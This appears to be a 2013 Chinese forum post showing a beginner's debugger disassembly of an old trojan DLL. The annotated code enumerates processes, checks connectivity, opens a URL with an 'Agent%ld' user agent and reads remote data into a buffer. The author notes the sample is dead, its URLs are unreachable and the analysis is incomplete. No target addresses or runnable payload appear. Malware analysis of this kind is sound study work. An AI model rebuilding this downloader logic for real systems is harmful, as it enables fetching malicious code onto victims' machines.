1000474D 56 push esi
1000474E C785 D8FEFFFF 2>mov dword ptr ss:[ebp-0x128],0x128
10004758 E8 473C0000 call <jmp.&KERNEL32.Process32First>
1000475D 85C0 test eax,eax
1000475F 74 10 je Xcbep6.10004771
10004761 8D85 D8FEFFFF lea eax,dword ptr ss:[ebp-0x128]
10004767 47 inc edi
10004768 50 push eax
10004769 56 push esi
1000476A E8 2F3C0000 call <jmp.&KERNEL32.Process32Next>
1000476F ^ EB EC jmp Xcbep6.1000475D
查看网络状况,建立连接到服务器,并准备下载的指定URL的数据 但是,这个木马早被杀了,这些url也无法访问
1000105A |. 895D E4 mov [local.7],ebx
1000105D |. 6A 01 push 0x1
1000105F |. 8D45 CC lea eax,[local.13]
10001062 |. 5E pop esi
10001063 |. 53 push ebx
10001064 |. 50 push eax
10001065 |. 8975 FC mov [local.1],esi
10001068 |. FF15 20620010 call dword ptr ds:[<&WININET.Inter>; wininet.InternetGetConnectedState
1000106E |. 8D4D F0 lea ecx,[local.4]
10001071 |. E8 080D0000 call <jmp.&MFC42.#540>
10001076 |. 8D4D EC lea ecx,[local.5]
10001079 |. C645 FC 02 mov byte ptr ss:[ebp-0x4],0x2
1000107D |. E8 FC0C0000 call <jmp.&MFC42.#540>
10001082 |. 68 24700010 push eqefh.10007024 ; ASCII "Error"
10001087 |. 8D4D F0 lea ecx,[local.4]
1000108A |. C645 FC 03 mov byte ptr ss:[ebp-0x4],0x3
1000108E |. E8 090D0000 call <jmp.&MFC42.#860>
10001093 |. 6A 40 push 0x40 ; /n = 40 (64.)
10001095 |. 8D85 7CFFFFFF lea eax,[local.33] ; |
1000109B |. 53 push ebx ; |c
1000109C |. 50 push eax ; |s
1000109D |. E8 64100000 call <jmp.&MSVCRT.memset> ; \memset
100010A2 |. 83C4 0C add esp,0xC
100010A5 |. FF15 28620010 call dword ptr ds:[<&WINMM.timeGet>; winmm.timeGetTime
100010AB |. 50 push eax ; /<%ld>
100010AC |. 8D85 7CFFFFFF lea eax,[local.33] ; |
100010B2 |. 68 40700010 push eqefh.10007040 ; |format = "Agent%ld"
100010B7 |. 50 push eax ; |s
100010B8 |. FF15 E0610010 call dword ptr ds:[<&MSVCRT.sprint>; \sprintf
100010BE |. 83C4 0C add esp,0xC
100010C1 |. F645 CC 04 test byte ptr ss:[ebp-0x34],0x4
100010C5 |. 53 push ebx
100010C6 |. 53 push ebx
100010C7 |. 53 push ebx
100010C8 |. 75 04 jnz Xeqefh.100010CE
100010CA |. 6A 04 push 0x4
100010CC |. EB 01 jmp Xeqefh.100010CF
100010CE |> 53 push ebx
100010CF |> 8D85 7CFFFFFF lea eax,[local.33]
100010D5 |. 50 push eax
100010D6 |. FF15 1C620010 call dword ptr ds:[<&WININET.Inter>; wininet.InternetOpenA
100010DC |. 3BC3 cmp eax,ebx
100010DE |. 8945 E8 mov [local.6],eax
100010E1 |. 75 14 jnz Xeqefh.100010F7
100010E3 |. 8B4D 08 mov ecx,[arg.1]
100010E6 |. 8D45 F0 lea eax,[local.4]
100010E9 |. 50 push eax
100010EA |. E8 A70C0000 call <jmp.&MFC42.#535>
100010EF |. 8975 E4 mov [local.7],esi
100010F2 |. E9 2B010000 jmp eqefh.10001222
100010F7 |> BE 30700010 mov esi,eqefh.10007030 ; ASCII "Accept: */*
"
100010FC |. 8D7D BC lea edi,[local.17]
100010FF |. A5 movs dword ptr es:[edi],dword ptr >
10001100 |. A5 movs dword ptr es:[edi],dword ptr >
10001101 |. A5 movs dword ptr es:[edi],dword ptr >
10001102 |. 53 push ebx
10001103 |. 8D45 BC lea eax,[local.17]
10001106 |. A5 movs dword ptr es:[edi],dword ptr >
10001107 |. 8B75 0C mov esi,[arg.2]
1000110A |. 68 00010084 push 0x84000100
1000110F |. 50 push eax ; /String
10001110 |. FF15 6C600010 call dword ptr ds:[<&KERNEL32.lstr>; \lstrlenA
10001116 |. 50 push eax
10001117 |. 8D45 BC lea eax,[local.17]
1000111A |. 50 push eax
1000111B |. 56 push esi
1000111C |. FF75 E8 push [local.6]
1000111F |. FF15 10620010 call dword ptr ds:[<&WININET.Inter>; wininet.InternetOpenUrlA
10001125 |. 8BF0 mov esi,eax
10001127 |. 3BF3 cmp esi,ebx
10001129 |. 8975 D4 mov [local.11],esi
1000112C |. 75 21 jnz Xeqefh.1000114F
1000112E |. FF75 E8 push [local.6]
10001131 |. FF15 14620010 call dword ptr ds:[<&WININET.Inter>; wininet.InternetCloseHandle
10001137 |. 8B4D 08 mov ecx,[arg.1]
1000113A |. 8D45 F0 lea eax,[local.4]
1000113D |. 50 push eax
1000113E |. E8 530C0000 call <jmp.&MFC42.#535>
10001143 |. C745 E4 01000>mov [local.7],0x1
1000114A |. E9 D3000000 jmp eqefh.10001222
1000114F |> 8D4D E0 lea ecx,[local.8]
10001152 |. 895D D8 mov [local.10],ebx
10001155 |. C745 D0 04000>mov [local.12],0x4
1000115C |. E8 1D0C0000 call <jmp.&MFC42.#540>
10001161 |. 8D45 D0 lea eax,[local.12]
10001164 |. 53 push ebx
10001165 |. 50 push eax
10001166 |. 8D45 D8 lea eax,[local.10]
10001169 |. 50 push eax
1000116A |. 68 05000020 push 0x20000005
1000116F |. 56 push esi
10001170 |. C645 FC 04 mov byte ptr ss:[ebp-0x4],0x4
10001174 |. FF15 0C620010 call dword ptr ds:[<&WININET.HttpQ>; wininet.HttpQueryInfoA
1000117A |. 85C0 test eax,eax
1000117C |. 75 03 jnz Xeqefh.10001181
1000117E |. 895D D8 mov [local.10],ebx
10001181 |> 68 00000100 push 0x10000 ; /n = 10000 (65536.)
10001186 |. 8D85 7CFFFEFF lea eax,[local.16417] ; |
1000118C |. 53 push ebx ; |c
1000118D |. 50 push eax ; |s
1000118E |. E8 730F0000 call <jmp.&MSVCRT.memset> ; \memset
10001193 |. 83C4 0C add esp,0xC
10001196 |. 8D45 DC lea eax,[local.9]
10001199 |. BF 00400000 mov edi,0x4000
1000119E |. 50 push eax
1000119F |. 8D85 7CFFFEFF lea eax,[local.16417]
100011A5 |. 57 push edi
100011A6 |. 50 push eax
100011A7 |. 56 push esi
100011A8 |. 8B35 18620010 mov esi,dword ptr ds:[<&WININET.In>; wininet.InternetReadFile
100011AE |> FFD6 /call esi
100011B0 |. 85C0 |test eax,eax
100011B2 |. 74 3A |je Xeqefh.100011EE
100011B4 |. 395D DC |cmp [local.9],ebx
100011B7 |. 74 3A |je Xeqefh.100011F3
100011B9 |. 8D85 7CFFFEFF |lea eax,[local.16417]
100011BF |. 50 |push eax
100011C0 |. 8D45 E0 |lea eax,[local.8]
100011C3 |. 68 2C700010 |push eqefh.1000702C ; ASCII "%s"
100011C8 |. 50 |push eax
100011C9 |. E8 C20B0000 |call <jmp.&MFC42.#2818>
100011CE |. 83C4 0C |add esp,0xC
100011D1 |. 8D45 E0 |lea eax,[local.8]
100011D4 |. 8D4D EC |lea ecx,[local.5]
100011D7 |. 50 |push eax
100011D8 |. E8 AD0B0000 |call <jmp.&MFC42.#939>
100011DD |. 8D45 DC |lea eax,[local.9]
100011E0 |. 50 |push eax
100011E1 |. 8D85 7CFFFEFF |lea eax,[local.16417]
100011E7 |. 57 |push edi
100011E8 |. 50 |push eax
100011E9 |. FF75 D4 |push [local.11]
100011EC |.^ EB C0 \jmp Xeqefh.100011AE
100011EE |> 8D45 F0 lea eax,[local.4]
100011F1 |. EB 13 jmp Xeqefh.10001206
100011F3 |> FF75 D4 push [local.11]
100011F6 |. 8B35 14620010 mov esi,dword ptr ds:[<&WININET.In>; wininet.InternetCloseHandle
100011FC |. FFD6 call esi ; <&WININET.InternetCloseHandle>
100011FE |. FF75 E8 push [local.6]
10001201 |. FFD6 call esi
10001203 |. 8D45 EC lea eax,[local.5]
10001206 |> 8B4D 08 mov ecx,[arg.1]
10001209 |. 50 push eax
1000120A |. E8 870B0000 call <jmp.&MFC42.#535>
1000120F |. 8D4D E0 lea ecx,[local.8]
10001212 |. C745 E4 01000>mov [local.7],0x1
10001219 |. C645 FC 03 mov byte ptr ss:[ebp-0x4],0x3
1000121D |. E8 4A0B0000 call <jmp.&MFC42.#800>
10001222 |> 8D4D EC lea ecx,[local.5]
10001225 |. C645 FC 02 mov byte ptr ss:[ebp-0x4],0x2
10001229 |. E8 3E0B0000 call <jmp.&MFC42.#800>
1000122E |. 8D4D F0 lea ecx,[local.4]
10001231 |. C645 FC 01 mov byte ptr ss:[ebp-0x4],0x1
10001235 |. E8 320B0000 call <jmp.&MFC42.#800>
1000123A |. 8D4D 0C lea ecx,[arg.2]
1000123D |. 885D FC mov byte ptr ss:[ebp-0x4],bl
10001240 |. E8 270B0000 call <jmp.&MFC42.#800>
由于这个木马真的太老了,下载不了指定的url,真不好玩。哎,到此我不晓得怎么去分析了。
感觉自己分析的很搓,有不对的地方希望读者可以提出。
|
免费评分
-
查看全部评分
|
发表于 2013-8-31 18:08
|
发表于 2013-8-31 21:37
